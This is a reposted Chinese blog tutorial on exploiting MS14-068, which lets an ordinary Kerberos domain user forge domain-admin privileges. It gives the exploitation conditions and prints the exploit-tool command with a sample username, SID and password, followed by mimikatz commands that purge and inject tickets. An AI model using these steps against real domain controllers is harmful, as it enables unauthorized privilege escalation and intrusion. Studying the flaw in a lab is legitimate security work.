前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >域渗透之MS14-068域提权漏洞

域渗透之MS14-068域提权漏洞

作者头像
全栈程序员站长
发布2022-07-13 20:00:48
发布2022-07-13 20:00:48
41500
代码可运行
举报
运行总次数:0
代码可运行

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之MS14-68域提权漏洞

漏洞概述

漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。

利用条件

域控机器没有打MS14-068的补丁(KB3011780)

需要一个域内用户和域内用户密码或hash,域内用户的suid

漏洞原理

服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器

MS14-068漏洞分析:Kerberos协议探索系列之票据篇

Kerberos认证原理

漏洞复现

Ms14-068利用工具

查询域控机器是否存在该补丁

代码语言:javascript
代码运行次数:0
复制
systeminfo |find "3011780"
代码语言:javascript
代码运行次数:0
复制
C:\Users\douser\Desktop>dir \\192.168.183.130\c$
拒绝访问。

使用普通用户权限,测试访问域控的C盘共享,访问被拒绝

代码语言:javascript
代码运行次数:0
复制
MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
代码语言:javascript
代码运行次数:0
复制
MS14-068.exe -u douser@demo -s S-1-5-21-979886063-111190
0045-1414766810-1107 -d 192.168.183.130 -p Dotest123

这里获取到一个TGT_douser@demo.com.ccache文件

清空票据

代码语言:javascript
代码运行次数:0
复制
kerberos::purge //清空已有票据

kerberos::list  //查看票据

注入票据

代码语言:javascript
代码运行次数:0
复制
kerberos::ptc TGT_douser@demo.com.ccache

mimikatz 不支持03系统注入

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/119830.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021年12月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 域渗透之MS14-68域提权漏洞
    • 漏洞概述
    • 利用条件
    • 漏洞原理
    • 漏洞复现
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档